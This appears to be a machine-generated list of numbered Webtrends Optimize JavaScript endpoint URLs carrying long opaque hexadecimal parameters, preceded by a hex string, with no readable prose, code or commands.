8d1267a3b4cd6d23b66d608fd61542275652f6c0b590e1a753c67069b48a7fc89012408726216ab142b610b6dc6f805705ccfacea01849a7dce8a19afabed01488c282b19a2582e52f65c5fc189b17e6491c6a2bda98cbf11a67a4e85f4338cae012d02f6b518ace0acd71b6e37a2a1c450940c12a160d7854f110eb1ef6dda0e97a86ce381daa5d65b51fede81f33dd6e98dd3fd8c176602dd4452

28.41. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c

28.42. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75d5010d692ad89ce20478fdda038aa0753f64b07ead19d11caf50cd75a632df77193a62612b5e7c9d6078da4a8476d3242d68e02f406c22e308b5e346da5b9638fb1fee0e12cc51afe6f31a01c4cbd5a0209f0efba58311bf558a07114d307f7f748fe32ef946716ffb97bd82703eb0392e758af6bce57844146ac2a00fb7ec24a886926fde5779c1ea94b83273b2c7a5f8ef6c0e3c72a73d7a7e6da98efae9ffee804345fa58b8e969a10047c915a7047da5b9c185a7a68d15ecc4fa1bef3ad3eb2387f16a034397f686bf0705876365c85e46a7284672840374716385395c0199f9fa5b728b6562a8729b36f124d2a6bb9e1eb37005d1610bb7cd7e496f310de1c06938c7510ae46c64c59a47ffbc10fcfa02bfa8ee7600e4b35b37ba7fc462c3900299c926f1e4fd768cba5f430f8c6a5fa5f8d31a2475371537b8bc2440c580257b4b71e1c0084e78e420c14ede5ef1b8501e7461bdbc8b69be53457201ab44ec22f0b2a34aa0ab77ccb8ef89d0a3665f559cc4381d6edbcc72131066e0ef09c53cb1c07f6fdd10beeccfe748bdaa7892a170cac0d7c323253596d5a9417803bbf18d04d047f76a34f89344cc71d1dca266a4e3ce70729955e4a588ac59251f141d6fd46fdb980e0a92d5fae78abd3f124873f3756deaf09139d660d5df01701329f9b2eb8bcb8ff0dc9156811860854926d97d5aac3facc2c62beed5d54daa84f95ee47c134ab9e097e266b27826980f2be9222a77974314710359444121312d58692f96e7c649295431cc87e0fa2e5923b286fd9272354a6f68690ac077cd2d574978183706b2b038bbc59e348da2a95fd19a2b150d07bedb78ab5c301e02bf2cbc78c8458a2cb43f573ad17988d3e3de312b4851cd610a86ffdba4ae5e76741d2ba2612b17449cbfb8327f7038007ed762e6eece45f89781111f33f9718bae687dcc8fa5796061423bf6a72a03f98b11405647a2a8e1e38c4afa54737ae44c999b6db129c631bfff68fc88e77af85217d3e1cdb826a30d15ffd6c542526342e3d010a004d236435539b15f6a98957250c716744a5117a33096396fc052a5ac8aabd02879d7cccd54daba1b9034dd07c281ba45a7350a00c0c9dd7e7293294c4f8e6a1ddbf4ba12a4587a660d0ff012505a3e84aa6e6f9854f6c63f7f2c5079d5a11f168d38715024afeab05e43102

28.43. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc09574d7af19c12ea78f5b6a327b4bbb25c6aff1812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3

28.44. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774

28.45. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055b27ece43f6b67250d626c3324dfc5f24665e19610aff21f06f7771fc5585dd90b50aa6c8281c8ebd2ba97ac4f849060f9bf5a8a7978a5df974008bda0bbcdc493071284fadbe1b9ece4490b55e8bc9d291f7261065f9772a81190210a5df2d53b3093a1e5baf6e4ee0281a66a1200432074bc2539f7fc318bbe2aee8205ba4b993c3d818c00abe76ae154ac4be1e16444df65c4d12929eb19ccc370786dda475b94a1dba4d45e0d49d109ce11f81671825f00bbf913c3d8496ffde4bb1e6a37a34610386c5149849847672b9277865f2d62bc9bcacedbe7bcc01b57b25f75119f416553cf0f9e3382818c37ba75532e024d0cc67f455cbf5112b9bce05b92d3eab5ac2a255a919c446c40134ec755ef66acc0a80662af3e760920bba4deb34233b0b23e7af8080927a2990a6f8cc86f68cb9d3df724b2e85caa480cc5d524a85713650c145b71a5a7929c45ddb48a1a7bffa54b73e0852fe69740434298d340d36343feba83b21c070571c72474b280cd2d25888cdb3ad39d8103f9073ea6456062434f0e3b43706520b52b917d0e3b2bb5287572dc4981551aa05c13f7df265f2d453c4ab23acd8e53d5c1c37b274f0a94c7b385428c3963c1c47d3689cf3a53cf195a6fb0f8d64f0460d76037b8bcd46595e0551b9e719160185b58116091bebe7e7408454b343178f9ab6cfe562577f19b64e907c0f2b6eaa50b82e9b80ff985b6332a659cd4986d1bce8c7233c0d3e59f69003cf1904f4aeda59b59ef975dcd8a38c791f5aae5725292f453c5a33e575fa2ee60c8e4a1f6765ce21cf7514c20745d827764c69ee052396594c0dd8d8c657a54ed0a74ef4e484aaa82c5aab7da3ddf83e9d335131b0de6c6986641702ba040f3ce29b04b9a5b4bf15d106770e8317549a7695d5acc7e1c4266bb1ee4641c0cf26ceab199321a4850164327f56ec2fc5a8f18921bd706c2e45032e8322745e5e8eca81ed7d633fd7ce0e5e8a7212b38bd27a3f3b8e7b705bbdedecf9e0512b93912dd1d3c26b7b4639c7fb06a959d36991b51ef5a24bc71da3fb9cf69e55bc37eb8786d7de09eacb0aee15eb0780d3303fe70de0881cd74fba61e6bd10e2e63215d8be211ab5764ecdfe8c27f005d144a2314028feff49cc2f540fa135c148e2f38c9a99f45f96531521ed6f27a53ac8e71a05647b718d136d92aba34c33f5139ac8e7df17cd6f4ff7a58fca8a23ffd5727d3e4ad8d46e66810bab63577720342c6d080d061f22693154cb4ff8ac81002359706213af427a62063dc0ae05245f9eaaed0dd7c824cbd64eacf4ed034d802b7f4af409215bf10f0c92dce57232c793a3e6abdabf4ba22b4583f63180f95a2452a3ef19a7b1aed4406a32a1a1ca57995641a23bd2851b1653e7e46fd65dcffa3be2858ef8df5e51fc8a87f861d8ba8edbeb93527d2f08308f06b02e4c782d206e57f58b0cbc9813b96bf04fac7df0c06130f8d0385b04d12a96

28.46. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392dc0819f545f021534118f9f569ee81c351728f187795199770be34ebb53a2327b7fc746c20d964cfb4dfea0125ff139c3341beb23256558186065fa27eb351111e216b5d5bff304beb5361fa5b633f740e2ff4310189b88f0fdcc9947eb1364958744c1ee6b3c266973a8b35acfce01dcb675b695eedaac681d63f95872d95f574bf0a61b1cac09091a54fe2309e228076de461477d5f56e048992f975ba7ffb5f67b18a4a7c9d59a1fd30cf372bb0106e48f5117537ab15b1f16d38380999a1a0086c5a868a37413e24d4ed6ecd60f8b90128337441ecd46b9d01e78c2c8f9df5487f2e307677b4db3f33f947fb24b11a8261a57f7b12d8cb9adb1e535921aaa642aa50f12fa52522ae6f3b52a486dfd1ec7765f935ab3b41aa84f8df46f6b87de6ac55335e82496e147a946d1539c6e5e8e0b30c319ab3c8a0f61b1b236c14ac017d9627f463905cfaad2e9d53966c1ecb989de9efddfb3b1123b4ee4d7cbc3880c040fc45d3742c7738d1e567e67dc458d0bedf6a5e043dc7e4a48a52b25432a2b9a310b3f2627e5ef71719766274a6742423855c4931d9b98a5b87abe04298873bd3c40457c68eae7bf35095e1714b92b84e3c2ad178818519cdc2316ac1392490ef873ffc707cca523fc8ee36f5f1e67e925f4aa1d283d0325c8c56a1e47d43f99a0f43ea796f7f40dd833a7465472502ad891110f0a0151bee2471c0f84b58b450312e9e5b5418004b619188fc1edcde2625c7a13b64fc22f042a3efb50b37b9d86fa9d0c3e30a60e9948d4d0b9eac6733d563d5df7ca0498175aa0fbd95cbbc4f628df8aae8f2a1e0eaa52782526486f0a61b77ea67db20c8d4845316d9d20cf71409509428d35685d52a1423fc302171bcb84cf4ff74fd6f246e8f5d791a92f2fe93dfe938773c64272009faa7d68ca7c0f49bb1f1a2fdef143a8adb3ae4dc4036f0c8317049b7a9083abcdaec6716fe0ee4f4ec8c173d4ac1cc72ea3890a39322a4be87dc7aaf6d620bd7b6d3946133b941e1b131dd299c0ef3c312880c81557dc6e15b28b807c3561817a7f1ca2f88092f64122968672c187d7263f2a0087b709b249d079c5ad49f1a54f931cf9f5c0a5d650a537fcc0c2d98543a9dd14af7cab4197893c6db543ee8518d347ab6ef1bf4be4b56110d9e87c10b4724acdabd52da707d75ebd702e6eefe3588f781210a63dc34ff9fd94e78bb948ca584777a13e7fa26fc5f01741322c2c8f4939c2afa54d36a5129d9cb2de40cd6058eab5b9fdb0549ef065242a118bc52777bd32bf200b7236393f6d170b061d706533019c1bf2e48006700c716d1ea51f7f7e0e6895f8562a51c0a7ba1a879a749d8616a3aab60307856c320d98646317ae5b1c9fcdb56433c6dcf0efb68ab843a27d44d8aa3e83e8153e3bcff95bf2e0bf885b6920b8b2a339d81b4abe7bd9941d0e06b0e76ed70797a730b79e8deed61347b883d2b22ac3a1c79f00f9213c

28.47. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5605a7f1b5afc5d9b38d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f776ea0bc0772d236b5b8ef7c1e2c6306ac6e7b88fc498f8daaab51f3745e9cfd5c28b0d1116df17661c831bd959042170df5ec141aebdb6ee4da1566113a43522133d3e922a0e28352de9bb7b79913728403e1c15281ad2f97588dcfce239bd457a9c3ca7557d013f35a7f6b72001451715e97fd4ebcaf31add005285de6850bb18900d4dbe6beaa94189bc67bc88a5750e4331e67ae6a55d2f300c209e966a4d18d3699bf2f63ea793a2f40d8031a415567c002bdfc2155d585655b5e04e1c58d5e789155d17bdb2e54f8000b143498dcebecde1605e281ab74d927a082f6bf90ab82d9882aece0c3162f2099b49da80b9ef92723e536959fdc850cb4e07a2ae8f5bbb99fb74d8dba4897f1e5aa8062a237f493e0e64b07ef078b1038e4a1e3130cb25cf2319900c44de2f764c6bef0421955c4f5e8dd2c504a247d0f349a1e584f8ac7d0ffc7ef1dffb24897265558bae05139d380152ea441b7889a214f8f0ecfc1c9752605ad611539622c584a295ffc7203bbee24d48dadb32b7ce75e446d29e027e632d5af13eabe8b09e7bea262e721b4d2f96441e1d13cedcc2886e635096884c16f43354d3ce803f3443f42d6443b3aa8a9fa44673c2d67295d182706d2f5583be0aea42df2e90a24ef5f7499411aaf594f6d350a430a0cac08f8f1fa08a15f92baf469cd86763b117ee831bd843fb6bfcec42b7e6694189b52213b37c18caff862fa7018105b92a263ab9e60f8b294246f039914cbee6d7decfab539f554220b53b23a13fcbe41e026c2c7e884f68c4aaf14d37a74195c1e1d81799604df4aed9cad925ad8a732f3a49dcd23e31da0ffa645420703b2e6e0f0e024e206e6307ca14f2a980042409206415ff162d62063a86e3414c1f8cb1e15bd2cc689d8a1aacabac0f0bd22d7a4ca40c2451a6000d97dfb62964c0c0a5e8bac6f60f020ab845

28.48. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5634a7f054ba3498f73914ebeb4a7b43817e4a18fdd93098342a6389f2866e08f3e2e75638d737d198594ecd0cb755bca9cf478e40640a4400dacda9d56d8e247c53b46449047ebc45b62d489ac921adcd1b2097f4226a4de10944e8169319c042664cece1cf1de9bc4844c947cbb2366e05715c017443ba29ce8751730be12d1255f915ab3b50ca55b9ce8187d9ecf1da2246ca847d1bf13bf5dc051b6546dbf2d4dad7e8c1acc3530e9f11df75ceb12cc34353b784491f7c1e2cf3d6cc6e3bc92db9afadca8b91f3645e7d7cac0890b131adf1666129b04db5b02237cdf5fc14fb6a2a5e043dc564b12bd3a620b252d8d3613373433f6b9797f933b28413e12012614aff95f89c5f2a321a556699232da5557002622ffeeaf331e5a1517ef7dd8ebcbf314c51f4d9ac13351a216800c1db0659fa269bbc251edd7f5315d5879ad3e01d0bd06

28.49. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5f17400eebc8ad58213ce16bc76e20e58ddb0521b5346b74a4c0b939fab858b3845c5caa275bc4214e60652fa9aa826b79c23b45e6234f1698d945b37d393f4800dc3a2a9476e2d5ed2d305ea49962b64c3436639f0bf7addb8f9b9e12c8519ea7235d21c5abd3d7908bbb3cb7f0a2af95a84640afa25d7ce67c628fb921a16d88849f87d3fc71f87e7419344c94c9c1323fe7456a364ce5d8d6724f1fd739c1cac4a83263f2979488ce483ba917a1990a0ecd4c893e99feff5432c51f3a68c87965f494d925c31489802d15f032f689206a648a9d2f7bc0dfa475111832c2541355de16a1f3c2678feb3792b9330741c6017413d02c6951bccc9a8b82de25772df23e13f44417b6eede2ee36065d431eea7dd3b7cba811de4f509edd201df746c4470dae7efd9506c5a523fe8eef3b5a4362e076fcf94d7c3b0474c9933a1b478b3ecbf1f03da2c7f2ab59dc60a3145422052fdbcd470b595d50e9e319190f85e380470d46bbe2e34f825cb0104cd4c0be9de734592e19b94bc22f0b7b34a958b37a9b82f9c8006566f05e9b1fdbd5efb8c0706b546f5df1cc09994c53f2fddb5cbdcfad20dd8caeda6a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fba901c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce724eefde8062313b83757f5babedd5c5f14625c7812596dbd375692a55d3ba0de51fcb6782c458b2bd098141e8ee93f98552ab24ffd09783844bfcdf15ad2cfd41cd8a6a6ce410e38848d815fa6da7e345e4b46612ddbf7614bf714fcaa8d77bf303d453ed252d68b9b40fdc2c4715a768c049eae0878fcdfe0593004576ef3020a76c9eb01955607d2ddf183796f9a11232a0449899e98d449b371fa7a188cad976fad6267b3b4ad8df3963d05af9355e2323627f650a5b0315763e3e50cb1bf4f9d20d770827621faf142f690d6b91fe55225cc1f9ea56879a729cd74ba8a4ba5648d17d7d1af5032e00a0095a93d6bd7364c4cbf5bda0ddbf14f07d45d8f335d1af007900a7ba1bfee0ff8b186837a2a5cd569c5605b9249e02cf94a7

